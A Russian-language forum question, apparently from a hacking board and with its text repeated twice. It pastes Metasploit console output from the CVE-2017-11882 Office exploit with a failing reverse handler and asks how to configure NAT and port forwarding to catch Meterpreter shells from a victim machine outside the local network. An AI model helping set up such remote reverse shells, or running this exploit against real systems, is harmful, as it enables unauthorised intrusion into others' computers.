L
llein
Проблема такого рода - при тестировании сплоитов в локальной сетке - все ок.
При тестировании сплоитов на внешней машине (вне локалки) - возникают сложности в виде:
msf exploit(office_ms17_11882) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 128.72.***.***:4444
[*] Started HTTPS reverse handler on
Звездочки отсебятина)
Я понял, что проблема моя в NATe (сижу через Билайновский роутер). Пробросил порты на машину, в LHOST указываю адрес роутера и один из проброшенных портов - реакция нулевая, метерпретер не появляется, тот же "Handler failed".
Вопрос: как в конфигурации Kali -> NAT(Роутер от Пчелайна) -> Интернет -> Машина жертвы
настроить NAT / переадресовывать порты, чтобы ловить meterpreter при том, что атакуемая машина НЕ в локальной сети.
В примере использую свежую CVE-2017-11882 и metepreter реверс. В локалке все работает на "ура"
При тестировании сплоитов на внешней машине (вне локалки) - возникают сложности в виде:
msf exploit(office_ms17_11882) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 128.72.***.***:4444
[*] Started HTTPS reverse handler on
Ссылка скрыта от гостей
Звездочки отсебятина)
Я понял, что проблема моя в NATe (сижу через Билайновский роутер). Пробросил порты на машину, в LHOST указываю адрес роутера и один из проброшенных портов - реакция нулевая, метерпретер не появляется, тот же "Handler failed".
Вопрос: как в конфигурации Kali -> NAT(Роутер от Пчелайна) -> Интернет -> Машина жертвы
настроить NAT / переадресовывать порты, чтобы ловить meterpreter при том, что атакуемая машина НЕ в локальной сети.
В примере использую свежую CVE-2017-11882 и metepreter реверс. В локалке все работает на "ура"